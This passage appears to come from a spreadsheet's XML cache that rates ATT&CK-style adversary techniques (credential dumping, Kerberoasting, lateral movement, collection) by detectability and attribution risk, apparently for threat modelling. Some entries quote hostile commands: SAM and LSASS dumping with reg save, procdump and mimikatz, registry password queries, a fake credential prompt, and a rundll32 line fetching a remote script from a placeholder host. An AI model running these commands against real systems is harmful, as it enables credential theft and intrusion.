    <s v="Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.1_x000a__x000a_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_x000a__x000a_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2 This variation of the technique is often referred to as a &quot;Squiblydoo&quot; attack and has been used in campaigns targeting governments.34_x000a__x000a_Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking."/>
    <n v="2"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Rootkit"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Rootkits are programs that hide the existence of malware by intercepting (i.e., Hooking) and modifying operating system API calls that supply system information.1 Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor, Master Boot Record, or the System Firmware.2_x000a__x000a_Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. "/>
    <n v="1"/>
    <s v="Rootkit detectors monitor for this"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Rundll32"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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_x000a__x000a_Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.1_x000a__x000a_Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https[:]//www[.]example[.]com/malicious.sct&quot;)&quot; This behavior has been seen used by malware such as Poweliks."/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Scripting"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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n v="3"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Signed Binary Proxy Execution"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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n v="3"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Software Packing"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory._x000a__x000a_Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available,1 but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses."/>
    <n v="0"/>
    <s v="No artefacts generated"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Space after Filename"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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quot;evil.txt &quot; (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed."/>
    <n v="3"/>
    <s v="Obvious detection method"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Timestomp"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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
    <n v="2"/>
    <s v="Abnormal timestamps"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Account Manipulation"/>
    <x v="7"/>
    <x v="10"/>
    <s v="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In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain."/>
    <n v="3"/>
    <s v="Tools may be used that are known bad"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Brute Force"/>
    <x v="7"/>
    <x v="10"/>
    <s v="Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained._x000a__x000a_Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.1_x000a__x000a_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2_x000a__x000a_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
    <n v="3"/>
    <s v="Very visible for admin"/>
    <n v="2"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Credential Dumping"/>
    <x v="7"/>
    <x v="10"/>
    <s v="Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information._x000a__x000a_Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well._x000a__x000a_SAM (Security Accounts Manager)_x000a_The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.   A number of tools can be used to retrieve the SAM file through in-memory techniques:_x000a__x000a_pwdumpx.exe_x000a_gsecdump_x000a_Mimikatz_x000a_secretsdump.py_x000a_Alternatively, the SAM can be extracted from the Registry with Reg:_x000a__x000a_reg save HKLM\sam sam_x000a_reg save HKLM\system system_x000a_Creddump7 can then be used to process the SAM database locally to retrieve hashes.1_x000a__x000a_Notes: Rid 500 account is the local, in-built administrator. Rid 501 is the guest account. User accounts start with a RID of 1,000+._x000a__x000a_Cached Credentials_x000a_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_x000a__x000a_pwdumpx.exe_x000a_gsecdump_x000a_Mimikatz_x000a_Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials._x000a__x000a_Notes: Cached credentials for Windows Vista are derived using PBKDF2._x000a__x000a_Local Security Authority (LSA) Secrets_x000a_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_x000a__x000a_pwdumpx.exe_x000a_gsecdump_x000a_Mimikatz_x000a_secretsdump.py_x000a_Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials._x000a__x000a_Notes: The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation._x000a__x000a_NTDS from Domain Controller_x000a_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2_x000a__x000a_The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.  _x000a__x000a_Volume Shadow Copy_x000a_secretsdump.py_x000a_Using the in-built Windows tool, ntdsutil.exe_x000a_Invoke-NinjaCopy_x000a_Group Policy Preference (GPP) Files_x000a_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34   The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:  _x000a__x000a_Metasploit’s post exploitation module: &quot;post/windows/gather/credentials/gpp&quot;_x000a_Get-GPPPassword5_x000a_gpprefdecrypt.py_x000a_  Notes: On the SYSVOL share, the following can be used to enumerate potential XML files. dir /s *.xml_x000a__x000a_Service Principle Names (SPNs)_x000a_See Kerberoasting._x000a__x000a_Plaintext Credentials_x000a_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_x000a__x000a_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6 Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.7   The following tools can be used to enumerate credentials:  _x000a__x000a_Windows Credential Editor_x000a_Mimikatz_x000a_  As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.   For example, on the target host use procdump:_x000a__x000a_procdump -ma lsass.exe lsass_dump_x000a_  Locally, mimikatz can be run:_x000a__x000a_sekurlsa::Minidump lsassdump.dmp_x000a_sekurlsa::logonPasswords_x000a_DCSync_x000a_DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API)891011 to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data 12 from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket13 or change an account's password as noted in Account Manipulation.14 DCSync functionality has been included in the &quot;lsadump&quot; module in Mimikatz.15 Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol."/>
    <n v="2"/>
    <s v="LSA access generates log entries"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Credentials in Files"/>
    <x v="7"/>
    <x v="10"/>
    <s v="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_x000a__x000a_It is possible to extract passwords from backups or saved virtual machines through Credential Dumping.1 Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller."/>
    <n v="0"/>
    <s v="Read only access to files. Leaves practically no traces"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Credentials in Registry"/>
    <x v="7"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Example commands to find Registry keys related to password information:1_x000a__x000a_Local Machine Hive: reg query HKLM /f password /t REG_SZ /s_x000a_Current User Hive: reg query HKCU /f password /t REG_SZ /s"/>
    <n v="0"/>
    <s v="Read only access to registry. Leaves practically no traces"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation for Credential Access"/>
    <x v="7"/>
    <x v="10"/>
    <s v="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12 Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained."/>
    <n v="0"/>
    <s v="Very hard to detect, instability may be an indicator"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Forced Authentication"/>
    <x v="7"/>
    <x v="10"/>
    <s v="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1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23_x000a__x000a_Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary,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4 With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials, or reuse it for Pass the Hash.5_x000a__x000a_There are several different ways this can occur.6 Some specifics from in-the-wild use include:_x000a__x000a_A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened. The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request.7_x000a_A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Input Capture"/>
    <x v="7"/>
    <x v="10"/>
    <s v="Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception._x000a__x000a_Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes,1 but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider.2_x000a__x000a_Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises._x000a__x000a_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 and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service."/>
    <n v="2"/>
    <s v="Multiple indicators up to physical devices"/>
    <n v="3"/>
    <s v="In case of physical device, local presence is needed"/>
    <n v="1"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Input Prompt"/>
    <x v="7"/>
    <x v="10"/>
    <s v="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_x000a__x000a_set thePassword to the text returned of (display dialog &quot;AdobeUpdater needs permission to check for updates. Please authenticate.&quot; default answer &quot;&quot;) 1_x000a__x000a_Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite."/>
    <n v="4"/>
    <s v="End-user visible"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Kerberoasting"/>
    <x v="7"/>
    <x v="10"/>
    <s v="Service principle names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service1).2345_x000a__x000a_Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).67 Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.765_x000a__x000a_This same attack could be executed using service tickets captured from network traffic."/>
    <n v="2"/>
    <s v="Enabling ticket auditing will identify this attack"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="LLMNR/NBT-NS Poisoning"/>
    <x v="7"/>
    <x v="10"/>
    <s v="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12_x000a__x000a_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 and crack the hashes offline through Brute Force to obtain the plaintext passwords."/>
    <n v="2"/>
    <s v="Spoofing detection tool makes this visible"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Network Sniffing"/>
    <x v="7"/>
    <x v="10"/>
    <s v="Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection._x000a__x000a_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techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning, can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Password Filter DLL"/>
    <x v="7"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation._x000a__x000a_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
    <n v="2"/>
    <s v="Modification of system files"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Two-Factor Authentication Interception"/>
    <x v="7"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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1_x000a__x000a_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2_x000a__x000a_Other hardware tokens, such as RSA SecurID, require the adversary to have access to the physical device or the seed and algorithm in addition to the corresponding credentials."/>
    <n v="0"/>
    <s v="Indistinguisable from legitimate traffic"/>
    <n v="2"/>
    <s v="Needs access to second token"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Application Deployment Software"/>
    <x v="8"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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n v="3"/>
    <s v="Standard tooling is used, which may lead to logs/audit trails"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Distributed Component Object Model"/>
    <x v="8"/>
    <x v="0"/>
    <s v="Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM)1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_x000a__x000a_Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.234 By default, only Administrators may remotely activate and launch COM objects through DCOM._x000a__x000a_Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications5 as well as other Windows objects that contain insecure methods.67 DCOM can also execute macros in existing documents8 and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application9, bypassing the need for a malicious document."/>
    <n v="1"/>
    <s v="Requires dedicated attention and monitoring "/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation of Remote Services"/>
    <x v="8"/>
    <x v="0"/>
    <s v="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_x000a__x000a_An adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Scanning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_x000a__x000a_There are several well-known vulnerabilities that exist in common services such as SMB1 and RDP2 as well as applications that may be used within internal networks such as MySQL3 and web server services.4_x000a__x000a_Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well."/>
    <n v="2"/>
    <s v="Detectable due to IOC's"/>
    <n v="0"/>
    <m/>
    <n v="3"/>
    <s v="Lateral movement may indicate targets of mission"/>
  </r>
  <r>
    <s v="Logon Scripts"/>
    <x v="8"/>
    <x v="0"/>
    <s v="Windows allows logon scripts to be run whenever a specific user or group of users log into a system.1 The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server._x000a__x000a_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n v="3"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Pass the Hash"/>
    <x v="8"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes."/>
    <n v="2"/>
    <s v="NTLM 3 logons without domain login"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Pass the Ticket"/>
    <x v="8"/>
    <x v="0"/>
    <s v="Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system._x000a__x000a_In this technique, valid Kerberos tickets for Valid Accounts are captured by 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12_x000a__x000a_Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).1_x000a__x000a_Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory."/>
    <n v="2"/>
    <s v="NTLM 3 logons without domain login"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Remote Desktop Protocol"/>
    <x v="8"/>
    <x v="0"/>
    <s v="Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).1 There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS._x000a__x000a_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 technique for Persistence.2_x000a__x000a_Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.3 This can be done remotely or locally and with active or disconnected sessions.4 It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Remote Services"/>
    <x v="8"/>
    <x v="0"/>
    <s v="An adversary may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user."/>
    <n v="1"/>
    <s v="Login times and locations may be an indicator"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Taint Shared Content"/>
    <x v="8"/>
    <x v="0"/>
    <s v="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_x000a__x000a_A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses Shortcut Modification of directory .LNK files that use Masquerading to look like the real directories, which are hidden through Hidden Files and Directories.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n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Third-party Software"/>
    <x v="8"/>
    <x v="0"/>
    <s v="Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code._x000a__x000a_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_x000a__x000a_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n v="3"/>
    <s v="Uncommon software may indicate"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Windows Admin Shares"/>
    <x v="8"/>
    <x v="0"/>
    <s v="Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$._x000a__x000a_Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB)1 to interact with systems using remote procedure calls (RPCs),2 transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.3_x000a__x000a_The Net utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials."/>
    <n v="2"/>
    <s v="Access to high privilege network components can be monitored"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Windows Remote Management"/>
    <x v="8"/>
    <x v="0"/>
    <s v="Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).1 It may be called with the winrm command or by any number of programs such as PowerShell."/>
    <n v="2"/>
    <s v="Montor WinRM usage"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Audio Capture"/>
    <x v="9"/>
    <x v="3"/>
    <s v="An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information._x000a__x000a_Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later."/>
    <n v="0"/>
    <s v="Difficult to detect due to the API's available"/>
    <n v="0"/>
    <s v="Does not disclose attacker"/>
    <n v="2"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Automated Collection"/>
    <x v="9"/>
    <x v="3"/>
    <s v="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_x000a__x000a_This technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files."/>
    <n v="2"/>
    <s v="Very visible for 2"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Clipboard Data"/>
    <x v="9"/>
    <x v="3"/>
    <s v="Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications."/>
    <n v="0"/>
    <s v="Access is indistinguishable from regular use"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Data Staged"/>
    <x v="9"/>
    <x v="3"/>
    <s v="Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted._x000a__x000a_Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location."/>
    <n v="3"/>
    <s v="Accumulation of large datastore is visible for administrators"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="4"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data from Information Repositories"/>
    <x v="9"/>
    <x v="3"/>
    <s v="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_x000a__x000a_The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:_x000a__x000a_Policies, procedures, and standards_x000a_Physical / logical network diagrams_x000a_System architecture diagrams_x000a_Technical system documentation_x000a_Testing / development credentials_x000a_Work / project schedules_x000a_Source code snippets_x000a_Links to network shares and other internal resources_x000a_Common information repositories:_x000a__x000a_Microsoft SharePoint_x000a_Found in many enterprise networks and often used to store and share significant amounts of documentation._x000a__x000a_Atlassian Confluence_x000a_Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation."/>
    <n v="0"/>
    <s v="With the right privileges, very hard to distinguis from legitimate use"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Data from Local System"/>
    <x v="9"/>
    <x v="3"/>
    <s v="Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration._x000a__x000a_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
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data from Network Shared Drive"/>
    <x v="9"/>
    <x v="3"/>
    <s v="Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration._x000a__x000a_Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data from Removable Media"/>
    <x v="9"/>
    <x v="3"/>
    <s v="Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration._x000a__x000a_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
    <n v="4"/>
    <s v="Slowness and unsuspected activity might alert user"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Email Collection"/>
    <x v="9"/>
    <x v="3"/>
    <s v="Adversaries may target user email to collect sensitive information from a target._x000a__x000a_Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost._x000a__x000a_Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network._x000a__x000a_Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access."/>
    <n v="1"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Input Capture"/>
    <x v="9"/>
    <x v="3"/>
    <s v="Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception._x000a__x000a_Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes,1 but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider.2_x000a__x000a_Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises._x000a__x000a_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 and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service."/>
    <n v="2"/>
    <s v="Multiple indicators up to physical devices"/>
    <n v="3"/>
    <s v="In case of physical device, local presence is needed"/>
    <n v="1"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Man in the Browser"/>
    <x v="9"/>
    <x v="3"/>
    <s v="Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.1_x000a__x000a_A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet.23_x000a__x000a_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n v="0"/>
    <s v="Indistinguisable from legitimate traffic"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Screen Capture"/>
    <x v="9"/>
    <x v="3"/>
    <s v="Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations."/>
    <n v="0"/>
    <s v="No artefacts generated"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Video Capture"/>
    <x v="9"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
    <n v="4"/>
    <s v="Most of the time webcams have alerting lights"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Webcam may indicate that the target is part of the missions target"/>
  </r>
  <r>
    <s v="Automated Exfiltration"/>
    <x v="10"/>
    <x v="11"/>
    <s v="Data, such as sensitive documents, may be exfiltrated through the use of automated processing or Scripting after being gathered during Collection._x000a__x000a_When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol."/>
    <n v="2"/>
    <s v="Very visible for SOC"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
